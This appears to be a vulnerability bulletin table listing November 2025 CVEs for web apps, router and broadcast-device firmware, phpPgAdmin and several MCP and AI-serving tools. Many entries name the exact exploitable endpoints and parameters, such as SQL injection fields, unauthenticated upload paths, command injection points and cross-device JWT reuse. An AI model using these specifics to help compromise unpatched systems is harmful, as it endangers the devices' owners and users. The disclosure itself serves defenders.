| n/a--Github Restaurant Website Restoran v1.0 | Github Restaurant Website Restoran v1.0 was discovered to contain a SQL injection vulnerability via the Contact Form page. | 2025-11-19 | not yet calculated | CVE-2025-63878 | https://www.linkedin.com/in/rumana-khatun-208aa731b/ https://github.com/rumanaemu/CVE-Research/blob/main/CVE-2025-63878.md   |
| n/a--H3C ERG3/ERG5 series routers and XiaoBei series routers, cloud gateways, and wireless access points (versions R0162P07, UAP700-WPT330-E2265, UAP672-WPT330-R2262, UAP662E-WPT330-R2262P03, WAP611-WPT330-R1348-OASIS, WAP662-WPT330-R2262, WAP662H-WPT330-R2262, USG300V2-WPT330-R2129, MSG300-WPT330-R1350, and MSG326-WPT330-R2129) | A remote command execution (RCE) vulnerability was discovered in all H3C ERG3/ERG5 series routers and XiaoBei series routers, cloud gateways, and wireless access points (versions R0162P07, UAP700-WPT330-E2265, UAP672-WPT330-R2262, UAP662E-WPT330-R2262P03, WAP611-WPT330-R1348-OASIS, WAP662-WPT330-R2262, WAP662H-WPT330-R2262, USG300V2-WPT330-R2129, MSG300-WPT330-R1350, and MSG326-WPT330-R2129). Attackers are able to exploit this vulnerability via injecting crafted commands into the sessionid parameter. | 2025-11-18 | not yet calculated | CVE-2025-63258 | http://h3c.com https://zhiliao.h3c.com/Theme/details/232571   |
| n/a--Ilevia EVE X1 Server Firmware | Cross Site Scripting vulnerability in Ilevia EVE X1 Server Firmware Version<= 4.7.18.0.eden:Logic Version<=6.00 - 2025_07_21 allows a remote attacker to execute arbitrary code via the /index.php component | 2025-11-20 | not yet calculated | CVE-2025-60737 | https://github.com/iSee857/ilevia-EVE-X1-Server-CSRF   |
| n/a--Ilevia EVE X1 Server Firmware | An issue in Ilevia EVE X1 Server Firmware Version v4.7.18.0.eden and before Logic Version v6.00 - 2025_07_21 and before allows a remote attacker to execute arbitrary code via the ping.php component does not perform secure filtering on IP parameters | 2025-11-20 | not yet calculated | CVE-2025-60738 | https://github.com/iSee857/ilevia-EVE-X1-Server   |
| n/a--Institute-of-Current-Students v1.0 | Institute-of-Current-Students v1.0 contains a time-based blind SQL injection vulnerability in the mydetailsstudent.php endpoint. The `myds` GET parameter is not adequately sanitized before being used in SQL queries. | 2025-11-20 | not yet calculated | CVE-2025-52410 | https://github.com/mathurvishal/Institute-of-Current-Students---PHP-Project/issues/2   |
| n/a--Itel DAB Encoder (IDEnc build 25aec8d) | The Itel DAB Encoder (IDEnc build 25aec8d) is vulnerable to Authentication Bypass due to improper JWT validation across devices. Attackers can reuse a valid JWT token obtained from one device to authenticate and gain administrative access to any other device running the same firmware, even if the passwords and networks are different. This allows full compromise of affected devices. | 2025-11-19 | not yet calculated | CVE-2025-63224 | https://www.itel.it/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63224_Itel%20DAB%20Encoder%20Authentication%20Bypass   |
| n/a--Itel DAB Gateway (IDGat build c041640a) | The Itel DAB Gateway (IDGat build c041640a) is vulnerable to Authentication Bypass due to improper JWT validation across devices. Attackers can reuse a valid JWT token obtained from one device to authenticate and gain administrative access to any other device running the same firmware, even if the passwords and networks are different. This allows full compromise of affected devices. | 2025-11-18 | not yet calculated | CVE-2025-63216 | https://www.itel.it/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63216_Itel%20DAB%20Gateway%20Authentication%20Bypass   |
| n/a--Itel DAB Gateway (IDGat build c041640a) | The Itel DAB MUX (IDMUX build c041640a) is vulnerable to Authentication Bypass due to improper JWT validation across devices. Attackers can reuse a valid JWT token obtained from one device to authenticate and gain administrative access to any other device running the same firmware, even if the passwords and networks are different. This allows full compromise of affected devices. | 2025-11-18 | not yet calculated | CVE-2025-63217 | https://www.itel.it/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63217%20_%20Itel%20DAB%20MUX%20Authentication%20Bypass   |
| n/a--ITEL ISO FM SFN Adapter (firmware ISO2 2.0.0.0, WebServer 2.0) | The ITEL ISO FM SFN Adapter (firmware ISO2 2.0.0.0, WebServer 2.0) is vulnerable to session hijacking due to improper session management on the /home.html endpoint. An attacker can access an active session without authentication, allowing them to control the device, modify configurations, and compromise system integrity. | 2025-11-19 | not yet calculated | CVE-2025-63219 | https://www.itel.it/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63219_ITEL%20ISO%20FM%20SFN%20Adapter%20-%20Session%20Hijacking   |
| n/a--Kashipara Ecommerce Website 1.0 | Kashipara Ecommerce Website 1.0 is vulnerable to SQL Injection via the recover_email parameter in user_password_recover.php. | 2025-11-17 | not yet calculated | CVE-2024-44651 | https://www.kashipara.com/project/php/322/ecommerce-website-in-php-with-source-code-download https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44651.md   |
| n/a--Kashipara Ecommerce Website 1.0 | Kashipara Ecommerce Website 1.0 is vulnerable to SQL Injection via the user_email, username, user_firstname, user_lastname, and user_address parameters in user_register.php. | 2025-11-17 | not yet calculated | CVE-2024-44652 | https://www.kashipara.com/project/php/322/ecommerce-website-in-php-with-source-code-download https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44652.md   |
| n/a--Kashipara Ecommerce Website 1.0 | Kashipara Ecommerce Website 1.0 is vulnerable to SQL Injection via the user_email parameter in user_login.php. | 2025-11-17 | not yet calculated | CVE-2024-44653 | https://www.kashipara.com/project/php/322/ecommerce-website-in-php-with-source-code-download https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44653.md   |
| n/a--kashipara School Management System 1.0 | kashipara School Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via the formuser and formpassword parameters in /adminLogin.php. | 2025-11-17 | not yet calculated | CVE-2024-46334 | https://www.kashipara.com/project/php/73/school-management-system-download-project-source-code-in-php https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-46334.md   |
| n/a--kashipara School Management System 1.0 | kashipara School Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via /client_user/feedback.php. | 2025-11-17 | not yet calculated | CVE-2024-46336 | https://www.kashipara.com/project/php/73/school-management-system-download-project-source-code-in-php https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-46336.md   |
| n/a--kishan0725 Hospital Management System | kishan0725 Hospital Management System has a Cross-Site Scripting (XSS) vulnerability in appsearch.php via the email parameter. | 2025-11-18 | not yet calculated | CVE-2025-63514 | https://github.com/kishan0725/Hospital-Management-System/issues/54 https://github.com/NicatAliyevh/Zero-Days/blob/main/Hospital_Management_System_Stored_XSS.md   |
| n/a--kishan0725 Hospital Management System v4 | kishan0725 Hospital Management System v4 has an Insecure Direct Object Reference (IDOR) vulnerability in the appointment cancellation functionality. | 2025-11-18 | not yet calculated | CVE-2025-63513 | https://github.com/kishan0725/Hospital-Management-System/issues/55 https://github.com/NicatAliyevh/Zero-Days/blob/main/Hospital_Management_System_IDOR.md   |
| n/a--kishan0725 Hospital Management System/ v4 | kishan0725 Hospital Management System/ v4 is vulnerable to SQL Injection in admin-panel1.php, specifically in the deleting doctor logic. The application fails to properly sanitize or parameterize user-supplied input from the demail parameter before incorporating it directly into a dynamic SQL query. | 2025-11-18 | not yet calculated | CVE-2025-63512 | https://github.com/NicatAliyevh/Zero-Days/blob/main/Hospital_Management_System_SQL2.md   |
| n/a--Kotaemon 0.11.0 | Cross site scripting (XSS) vulnerability in Kotaemon 0.11.0 allowing attackers to execute arbitrary code via a crafted PDF. | 2025-11-18 | not yet calculated | CVE-2025-56526 | https://github.com/Cinnamon/kotaemon/commit/37cdc28 https://github.com/Cinnamon/kotaemon https://skinny-exoplanet-584.notion.site/Stored-XSS-via-Unsanitized-PDF-Content-Rendering-and-Plaintext-Credential-Exposure-in-LocalStorage-22cd1563bd3380458588eb49f361a363 https://github.com/HanTul/Kotaemon-CVE-2025-56526-56527-disclosure https://harvest-sink-590.notion.site/Stored-XSS-via-Unsanitized-PDF-Content-Rendering-and-Plaintext-Credential-Exposure-in-LocalStorage-236770c3fe1e80f6a1aef381fb1c8f73   |
| n/a--Kotaemon 0.11.0 | Plaintext password storage in Kotaemon 0.11.0 in the client's localStorage. | 2025-11-18 | not yet calculated | CVE-2025-56527 | https://github.com/Cinnamon/kotaemon/commit/37cdc28 https://github.com/Cinnamon/kotaemon https://skinny-exoplanet-584.notion.site/Stored-XSS-via-Unsanitized-PDF-Content-Rendering-and-Plaintext-Credential-Exposure-in-LocalStorage-22cd1563bd3380458588eb49f361a363?pvs=74 https://github.com/HanTul/Kotaemon-CVE-2025-56526-56527-disclosure https://harvest-sink-590.notion.site/Stored-XSS-via-Unsanitized-PDF-Content-Rendering-and-Plaintext-Credential-Exposure-in-LocalStorage-236770c3fe1e80f6a1aef381fb1c8f73   |
| n/a--Local Agent DVR versions thru 6.6.1.0 | Local Agent DVR versions thru 6.6.1.0 are vulnerable to directory traversal that allows an unauthenticated local attacker to gain access to sensitive information, cause a server-side forgery request (SSRF), or execute OS commands. | 2025-11-18 | not yet calculated | CVE-2025-63408 | https://www.ericholub.com/blog/agent-dvr-rce/ https://ispysoftware.github.io/Agent_API/   |
| n/a--MCP Data Science Server | A command injection vulnerability exists in the MCP Data Science Server's (reading-plus-ai/mcp-server-data-exploration) 0.1.6 in the safe_eval() function (src/mcp_server_ds/server.py:108). The function uses Python's exec() to execute user-supplied scripts but fails to restrict the __builtins__ dictionary in the globals parameter. When __builtins__ is not explicitly defined, Python automatically provides access to all built-in functions including __import__, exec, eval, and open. This allows an attacker to execute arbitrary Python code with full system privileges, leading to complete system compromise. The vulnerability can be exploited by submitting a malicious script to the run_script tool, requiring no authentication or special privileges. | 2025-11-18 | not yet calculated | CVE-2025-63603 | https://github.com/reading-plus-ai/mcp-server-data-exploration/issues/12   |
| n/a--mihomo v1.19.11 | Incorrect access control in mihomo v1.19.11 allows authenticated attackers with low-level privileges to read arbitrary files with elevated privileges via obtaining the external control key from the config file. | 2025-11-18 | not yet calculated | CVE-2025-56499 | https://github.com/MetaCubeX/mihomo/tree/v1.19.11 https://github.com/Cherrling/CVE-2025-56499   |
| n/a--Milos Paripovic OneCommander 3.102.0.0 | Milos Paripovic OneCommander 3.102.0.0 is vulnerable to Directory Traversal. The vulnerability resides in the ZIP file processing component, specifically in the functionality responsible for extracting and handling ZIP archive contents. | 2025-11-19 | not yet calculated | CVE-2025-63371 | https://www.onecommander.com/ https://jeroscope.com/advisories/2025/jero-2025-007/   |
| n/a--Modular Max Serve before 25.6 | Unsafe Deserialization vulnerability in Modular Max Serve before 25.6, specifically when the "--experimental-enable-kvcache-agent" feature is used allowing attackers to execute arbitrary code. | 2025-11-18 | not yet calculated | CVE-2025-60455 | https://github.com/modular/modular/issues/4795 https://github.com/modular/modular/blame/main/max/serve/kvcache_agent/kvcache_agent.py#L220 https://github.com/modular/modular/commit/10620059fb5c47fb0c30e5d21a8ff3b8d622fba4 https://github.com/modular/modular/commit/ee9c4ab02345dd30bed8b79771b6909ff1b930a1 https://github.com/modular/modular/commit/b20e749fa892dbe772e890a268002f732164d9f5 https://www.oligo.security/blog/shadowmq-how-code-reuse-spread-critical-vulnerabilities-across-the-ai-ecosystem   |
| n/a--Mozart FM Transmitter version WEBMOZZI-00287 | The Mozart FM Transmitter web management interface on version WEBMOZZI-00287, contains an unrestricted file upload vulnerability in the /patch.php endpoint. An attacker with administrative credentials can upload arbitrary files (e.g., PHP webshells), which are stored in the /patch/ directory. This allows the attacker to execute arbitrary commands on the server, potentially leading to full system compromise. | 2025-11-18 | not yet calculated | CVE-2025-63227 | https://www.dbbroadcast.com/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63227_Mozart_FM_Transmitter_authenticated_File_Upload   |
| n/a--Mozart FM Transmitter version WEBMOZZI-00287 | The Mozart FM Transmitter web management interface on version WEBMOZZI-00287, contains an unauthenticated file upload vulnerability in the /upload_file.php endpoint. An attacker can exploit this by sending a crafted POST request with a malicious file (e.g., a PHP webshell) to the server. The uploaded file is stored in the /upload/ directory, enabling remote code execution and full system compromise. | 2025-11-18 | not yet calculated | CVE-2025-63228 | https://www.dbbroadcast.com/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63228_Mozart_FM_Transmitter_Unauthenticated_File_Upload   |
| n/a--Mozart FM Transmitter version WEBMOZZI-00287 | The Mozart FM Transmitter web management interface on version WEBMOZZI-00287, contains a reflected Cross-Site Scripting (XSS) vulnerability in the /main0.php endpoint. By injecting a malicious JavaScript payload into the ?m= query parameter, an attacker can execute arbitrary code in the victim's browser, potentially stealing sensitive information, hijacking sessions, or performing unauthorized actions. | 2025-11-18 | not yet calculated | CVE-2025-63229 | https://www.dbbroadcast.com/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63229_Mozart_FM_Transmitter_xss   |
| n/a--MyScreenTools v2.2.1.0 | MyScreenTools v2.2.1.0 contains a critical OS command injection vulnerability in the GIF compression tool. The application fails to properly sanitize user-supplied file paths before passing them to cmd.exe, allowing attackers to execute arbitrary system commands with the privileges of the user running the application. The vulnerability exists in the CMD() function within GIFSicleTool\Form_gif_sicle_tool.cs, which constructs shell commands by concatenating unsanitized user input (file paths) and executes them via cmd.exe. | 2025-11-17 | not yet calculated | CVE-2025-63916 | https://github.com/luotengyuan/MyScreenTools/blob/master/GIFSicleTool/Form_gif_sicle_tool.cs https://github.com/luotengyuan/MyScreenTools/tree/master https://github.com/cydtseng/Vulnerability-Research/blob/main/myscreentools/OSCommandInjection-GifCompression.md   |
| n/a--FS[.]com | FS Inc S3150-8T2F 8-Port Gigabit Ethernet L2+ Switch, 8 x Gigabit RJ45, with 2 x 1Gb SFP, Fanless. All versions before 2.2.0D Build 135103 were discovered to transmit cookies for their web based administrative application containing usernames and passwords. These were transmitted in cleartext using simple base64 encoding during every POST request made to the server. | 2025-11-20 | not yet calculated | CVE-2025-25613 | http://fs.com http://s3150-8t2f.com https://github.com/SwiftSecur/S3150-8T2F-FS.com-Research/wiki   |
| n/a--openml.org | The openml/openml.org web application version v2.0.20241110 uses predictable MD5-based tokens for critical user workflows such as signup confirmation, password resets, email confirmation resends, and email change confirmation. These tokens are generated by hashing the current timestamp formatted as "%d %H:%M:%S" without incorporating any user-specific data or cryptographic randomness. This predictability allows remote attackers to brute-force valid tokens within a small time window, enabling unauthorized account confirmation, password resets, and email change approvals, potentially leading to account takeover. | 2025-11-18 | not yet calculated | CVE-2025-55796 | https://github.com/openml https://github.com/openml/openml.org https://github.com/openml/openml.org/security/advisories/GHSA-xfjh-gf9p-8qr6   |
| n/a--n/a | A code injection vulnerability exists in baryhuang/mcp-server-aws-resources-python 0.1.0 that allows remote code execution through insufficient input validation in the execute_query method. The vulnerability stems from the exposure of dangerous Python built-in functions (__import__, getattr, hasattr) in the execution namespace and the direct use of exec() to execute user-supplied code. An attacker can craft malicious queries to execute arbitrary Python code, leading to AWS credential theft (AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY), file system access, environment variable disclosure, and potential system compromise. The vulnerability allows attackers to bypass intended security controls and gain unauthorized access to sensitive AWS resources and credentials stored in the server's environment. | 2025-11-18 | not yet calculated | CVE-2025-63604 | https://github.com/baryhuang/mcp-server-aws-resources-python/issues/8   |
| n/a--Newtec Celox UHD (models: CELOXA504, CELOXA820) running firmware version celox-21.6.13 | The Newtec Celox UHD (models: CELOXA504, CELOXA820) running firmware version celox-21.6.13 is vulnerable to an authentication bypass. An attacker can exploit this issue by modifying intercepted responses from the /celoxservice endpoint. By injecting a forged response body during the loginWithUserName flow, the attacker can gain Superuser or Operator access without providing valid credentials. | 2025-11-19 | not yet calculated | CVE-2025-63210 | https://www.newtec.com/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63210_Newtec%20Celox%20UHD%20Authentication%20Bypass%20_%20Privilege%20Escalation   |
| n/a--Open Source Point of Sale 3.4.1 | The password change endpoint in Open Source Point of Sale 3.4.1 allows users to set their account password to an empty string due to missing server-side validation. When an authenticated user omits or leaves the `password` and `repeat_password` parameters empty in the password change request, the backend still returns a successful response and sets the password to an empty string. This effectively disables authentication and may allow unauthorized access to user or administrative accounts. | 2025-11-18 | not yet calculated | CVE-2025-63800 | https://github.com/opensourcepos/opensourcepos https://opensourcepos.org/ https://github.com/omkaryepre/vulnerability-research/tree/main/CVE-2025-63800   |
| n/a--OpenRapid RapidCMS 1.3.1 | OpenRapid RapidCMS 1.3.1 is vulnerable to Cross Site Scripting (XSS) in /system/update-run.php. | 2025-11-17 | not yet calculated | CVE-2025-64046 | http://rapidcms.com https://gist.github.com/b1uel0n3/c8467f156f523fcf16dc572a34693126   |
| n/a--PDFPatcher thru 1.1.3.4663 | PDFPatcher thru 1.1.3.4663 executable's XML bookmark import functionality does not restrict XML external entity (XXE) references. The application uses .NET's XmlDocument class without disabling external entity resolution, enabling attackers to: Read arbitrary files from the victim's filesystem, exfiltrate sensitive data via out-of-band (OOB) HTTP requests, perform SSRF attacks against internal network resources, or cause a denial of service via entity expansion attacks. | 2025-11-17 | not yet calculated | CVE-2025-63917 | https://www.cnblogs.com/pdfpatcher https://github.com/wmjordan/PDFPatcher https://github.com/cydtseng/Vulnerability-Research/blob/main/pdfpatcher/XXE-Importers.md   |
| n/a--PDFPatcher  | PDFPatcher executable does not validate user-supplied file paths, allowing directory traversal attacks allowing attackers to upload arbitrary files to arbitrary locations. | 2025-11-17 | not yet calculated | CVE-2025-63918 | https://www.cnblogs.com/pdfpatcher https://github.com/wmjordan/PDFPatcher https://github.com/cydtseng/Vulnerability-Research/blob/main/pdfpatcher/DirectoryTraversal-ImageExport.md   |
| n/a--PHPGurukul Complaint Management System 2.0 | PHPGurukul Complaint Management System 2.0 is vulnerable to SQL Injection via the email and mobileno parameters in reset-password.php. | 2025-11-17 | not yet calculated | CVE-2024-44654 | https://phpgurukul.com/complaint-management-sytem https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44654.md   |
| n/a--PHPGurukul Complaint Management System 2.0 | PHPGurukul Complaint Management System 2.0 is vulnerable to Cross Site Scripting (XSS) via the search parameter in user-search.php. | 2025-11-17 | not yet calculated | CVE-2024-44655 | https://phpgurukul.com/complaint-management-sytem https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44655.md   |
| n/a--PHPGurukul Complaint Management System 2.0 | PHPGurukul Complaint Management System 2.0 is vulnerable to SQL Injection via the fromdate and todate parameters in between-date-userreport.php. | 2025-11-17 | not yet calculated | CVE-2024-44657 | https://phpgurukul.com/complaint-management-sytem https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44657.md   |
| n/a--PHPGurukul Complaint Management System 2.0 | PHPGurukul Complaint Management System 2.0 is vulnerable to SQL Injection via the subcategory and category parameters in subcategory.php. | 2025-11-17 | not yet calculated | CVE-2024-44658 | https://phpgurukul.com/complaint-management-sytem https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44658.md   |
| n/a--PHPGurukul Complaint Management System 2.0 | PHPGurukul Complaint Management System 2.0 is vulnerble to Cross Site Scripting (XSS) via the fromdate and todate parameters in between-date-userreport.php. | 2025-11-17 | not yet calculated | CVE-2024-46335 | https://phpgurukul.com/complaint-management-sytem https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-46335.md   |
| n/a--PHPGurukul Online Shopping Portal 2.0 | PHPGurukul Online Shopping Portal 2.0 is vulnerable to SQL Injection via the email parameter in forgot-password.php. | 2025-11-17 | not yet calculated | CVE-2024-44659 | https://phpgurukul.com/shopping-portal-free-download/ https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44659.md   |
| n/a--PHPGurukul Online Shopping Portal 2.0 | PHPGurukul Online Shopping Portal 2.0 is vulnerable to SQL Injection via the fullname, emailid, and contactno parameters in login.php. | 2025-11-17 | not yet calculated | CVE-2024-44660 | https://phpgurukul.com/shopping-portal-free-download/ https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44660.md   |
| n/a--PHPGurukul Online Shopping Portal 2.0 | PHPGurukul Online Shopping Portal 2.0 is vulnerable to Cross Site Scripting (XSS) via the quantity parameter in my-cart.php. | 2025-11-17 | not yet calculated | CVE-2024-44661 | https://phpgurukul.com/shopping-portal-free-download/ https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44661.md   |
| n/a--PHPGurukul Online Shopping Portal 2.0 | PHPGurukul Online Shopping Portal 2.0 is vulnerable to SQL Injection via the username parameter in the admin page. | 2025-11-17 | not yet calculated | CVE-2024-44662 | https://phpgurukul.com/shopping-portal-free-download/ https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44662.md   |
| n/a--PHPGurukul Online Shopping Portal 2.0 | PHPGurukul Online Shopping Portal 2.0 is vulnerable to SQL Injection via the product parameter in search-result.php. | 2025-11-17 | not yet calculated | CVE-2024-44663 | https://phpgurukul.com/shopping-portal-free-download/ https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44663.md   |
| n/a--PHPGurukul Online Shopping Portal 2.0 | PHPGurukul Online Shopping Portal 2.0 is vulnerable to SQL Injection via the name, summary, review, quality, price, and value parameters in product-details.php. | 2025-11-17 | not yet calculated | CVE-2024-44664 | https://phpgurukul.com/shopping-portal-free-download/ https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44664.md   |
| n/a--PHPGurukul Small CRM 3.0 | PHPGurukul Small CRM 3.0 is vulnerable to SQL Injection via the oldpass parameter in change-password.php. | 2025-11-17 | not yet calculated | CVE-2024-44641 | https://phpgurukul.com/small-crm-php/ https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44641.md   |
| n/a--PHPGurukul Small CRM 3.0 | PHPGurukul Small CRM 3.0 is vulnerable to SQL Injection via the frm_id and aremark parameters in manage-tickets.php. | 2025-11-17 | not yet calculated | CVE-2024-44644 | https://phpgurukul.com/small-crm-php/ https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44644.md   |
| n/a--PHPGurukul Small CRM 3.0 | PHPGurukul Small CRM 3.0 is vulnerable to Cross Site Scripting (XSS) via the aremark parameter in manage-tickets.php. | 2025-11-17 | not yet calculated | CVE-2024-44647 | https://phpgurukul.com/small-crm-php/ https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44647.md   |
| n/a--PHPGurukul Small CRM 3.0 | PHPGurukul Small CRM 3.0 is vulnerable to SQL Injection via id and adminremark parameters in quote-details.php. | 2025-11-17 | not yet calculated | CVE-2024-44648 | https://phpgurukul.com/small-crm-php/ https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44648.md   |
| n/a--PHPGurukul Student Record System v3.2 | A Cross-Site Request Forgery (CSRF) vulnerability in the manage-students.php component of PHPGurukul Student Record System v3.2 allows an attacker to trick an authenticated administrator into submitting a forged request. This leads to the unauthorized deletion of user accounts, causing a Denial of Service (DoS). | 2025-11-18 | not yet calculated | CVE-2025-63955 | https://phpgurukul.com/student-record-system-php/ https://github.com/Wayne-arul/CVE-Disclosures/tree/main/CVE-2025-63955   |
| n/a--phpPgAdmin 7.13.0 | phpPgAdmin 7.13.0 and earlier contains multiple cross-site scripting (XSS) vulnerabilities across various components. User-supplied input from $_REQUEST parameters is reflected in HTML output without proper encoding or sanitization in multiple locations including sequences.php, indexes.php, admin.php, and other unspecified files. An attacker can exploit these vulnerabilities to execute arbitrary JavaScript in victims' browsers, potentially leading to session hijacking, credential theft, or other malicious actions. | 2025-11-20 | not yet calculated | CVE-2025-60796 | https://github.com/phppgadmin/phppgadmin/blob/master/sequences.php#L316 https://github.com/phppgadmin/phppgadmin/blob/master/indexes.php#L29 https://github.com/phppgadmin/phppgadmin/blob/master/admin.php#L35 https://github.com/pr0wl1ng/security-advisories/blob/main/CVE-2025-60796.md   |
| n/a--phpPgAdmin 7.13.0 | phpPgAdmin 7.13.0 and earlier contains a SQL injection vulnerability in dataexport.php at line 118. The application directly executes user-supplied SQL queries from the $_REQUEST['query'] parameter without any sanitization or parameterization via $data->conn->Execute($_REQUEST['query']). An authenticated attacker can exploit this vulnerability to execute arbitrary SQL commands, potentially leading to complete database compromise, data theft, or privilege escalation. | 2025-11-20 | not yet calculated | CVE-2025-60797 | https://github.com/phppgadmin/phppgadmin/blob/master/dataexport.php#L118 https://github.com/pr0wl1ng/security-advisories/blob/main/CVE-2025-60797.md   |
| n/a--phpPgAdmin 7.13.0 | phpPgAdmin 7.13.0 and earlier contains a SQL injection vulnerability in display.php at line 396. The application passes user-controlled input from $_REQUEST['query'] directly to the browseQuery function without proper sanitization. An authenticated attacker can exploit this vulnerability to execute arbitrary SQL commands through malicious query manipulation, potentially leading to complete database compromise. | 2025-11-20 | not yet calculated | CVE-2025-60798 | https://github.com/phppgadmin/phppgadmin/blob/master/display.php#L396 https://github.com/pr0wl1ng/security-advisories/blob/main/CVE-2025-60797.md https://github.com/pr0wl1ng/security-advisories/blob/main/CVE-2025-60798.md   |
| n/a--phpPgAdmin 7.13.0 | phpPgAdmin 7.13.0 and earlier contains an incorrect access control vulnerability in sql.php at lines 68-76. The application allows unauthorized manipulation of session variables by accepting user-controlled parameters ('subject', 'server', 'database', 'queryid') without proper validation or access control checks. Attackers can exploit this to store arbitrary SQL queries in $_SESSION['sqlquery'] by manipulating these parameters, potentially leading to session poisoning, stored cross-site scripting, or unauthorized access to sensitive session data. | 2025-11-20 | not yet calculated | CVE-2025-60799 | https://github.com/phppgadmin/phppgadmin/blob/master/sql.php#L68-L76 https://github.com/pr0wl1ng/security-advisories/blob/main/CVE-2025-60799.md   |
| n/a--Pixeon WebLaudos 25.1 (01) | A reflected cross-site scripting (XSS) vulnerability exists in the password change functionality of Pixeon WebLaudos 25.1 (01). The sle_sSenha parameter to the loginAlterarSenha.asp file. An attacker can craft a malicious URL that, when visited by a victim, causes arbitrary JavaScript code to be executed in the victim's browser within the security context of the vulnerable application. This issue could allow attackers to steal session cookies, disclose sensitive information, perform unauthorized actions on behalf of the user, or conduct phishing attacks. | 2025-11-19 | not yet calculated | CVE-2025-63243 | https://www.pixeon.com/ https://medium.com/@wagneralves_87750/cve-2025-63243-reflected-cross-site-scripting-in-loginalterarsenha-asp-via-sle-slogin-parameter-53808fbbeeee   |
| n/a--pnetlab 5.3.11 | pnetlab 5.3.11 is vulnerable to Command Injection via the qemu_options parameter. | 2025-11-18 | not yet calculated | CVE-2025-63749 | https://github.com/XunMInt/cve/blob/main/Pnetlab-20251013.md   |
| n/a--QaTraq 6.9.2 | QaTraq 6.9.2 allows authenticated users to upload arbitrary files via the "Add Attachment" feature in the "Test Script" module. The application fails to restrict file types, enabling the upload of executable PHP files. Once uploaded, the file can be accessed through the "View Attachment" option, which executes the PHP payload on the server. | 2025-11-17 | not yet calculated | CVE-2025-63748 | http://qatraq.com https://bitsbyamg.com/blog/post/2025/10/19/qatraq-692-default-creds-and-file-upload-rce   |
| n/a--QaTraq 6.9.2 ships | QaTraq 6.9.2 ships with administrative account credentials which are enabled in default installations and permit immediate login via the web application login page. Because the account provides administrative privileges in the default configuration, an attacker who can reach the login page can gain administrative access. | 2025-11-17 | not yet calculated | CVE-2025-63747 | http://qatraq.com https://bitsbyamg.com/blog/post/2025/10/19/qatraq-692-default-creds-and-file-upload-rce   |
| n/a--Qlik Sense Enterprise v14.212.13 | Qlik Sense Enterprise v14.212.13 was discovered to contain an information leak via the /dev-hub/ directory. | 2025-11-20 | not yet calculated | CVE-2025-61138 | https://gist.github.com/Israel0x00/8a81ec98162e9ca8e4a3a6c8b4ef4762   |
| n/a--Quark Cloud Drive v3.23.2 | Quark Cloud Drive v3.23.2 has a DLL Hijacking vulnerability. This vulnerability stems from the insecure loading of system libraries. Specifically, the application does not validate the path or signature of [regsvr32.exe] it loads. An attacker can place a crafted malicious DLL in the application's startup directory, which will be loaded and executed when the user launches the program. | 2025-11-20 | not yet calculated | CVE-2025-63685 | https://github.com/QIU-DIE/CVE/issues/5   |
| n/a--QVidium Opera11 device (firmware version 2.9.0-Ax4x-opera11) | The QVidium Opera11 device (firmware version 2.9.0-Ax4x-opera11) is vulnerable to Remote Code Execution (RCE) due to improper input validation on the /cgi-bin/net_ping.cgi endpoint. An attacker can exploit this vulnerability by sending a specially crafted GET request with a malicious parameter to inject arbitrary commands. These commands are executed with root privileges, allowing attackers to gain full control over the device. This poses a significant security risk to any device running this software. | 2025-11-19 | not yet calculated | CVE-2025-63213 | https://qvidium.tv/ https://undercodetesting.com/zero-day-vulnerabilities-discovered-in-qvidium-opera11-remote-code-execution-rce-exploit/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63213_QVidium%20Opera11%20RCE   |
| n/a--R.V.R Elettronica TEX | The R.V.R Elettronica TEX product (firmware TEXL-000400, Web GUI TLAN-000400) is vulnerable to broken access control due to improper authentication checks on the /_Passwd.html endpoint. An attacker can send an unauthenticated POST request to change the Admin, Operator, and User passwords, resulting in complete system compromise. | 2025-11-19 | not yet calculated | CVE-2025-63207 | https://www.rvr.it/en/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63207_RVR%20Elettronica%20TEX%20Broken%20Access%20Control   |
| n/a--Requarks Wiki.js 2.5.307 | Requarks Wiki.js 2.5.307 does not properly revoke or invalidate active JWT tokens when a user logs out. As a result, previously issued tokens remain valid and can be reused to access the system, even after logout. This behavior affects session integrity and may allow unauthorized access if a token is compromised. The issue is present in the authentication resolver logic and affects both the GraphQL endpoint and the logout mechanism. | 2025-11-18 | not yet calculated | CVE-2025-56643 | https://github.com/0xBS0D27/CVE-2025-56643   |
| n/a--RichFilemanager v2.7.6 | An arbitrary file upload vulnerability in the /php/UploadHandler.php component of RichFilemanager v2.7.6 allows attackers to execute arbitrary code via uploading a crafted file. | 2025-11-18 | not yet calculated | CVE-2025-63994 | https://github.com/psolom/RichFilemanager/issues/412   |
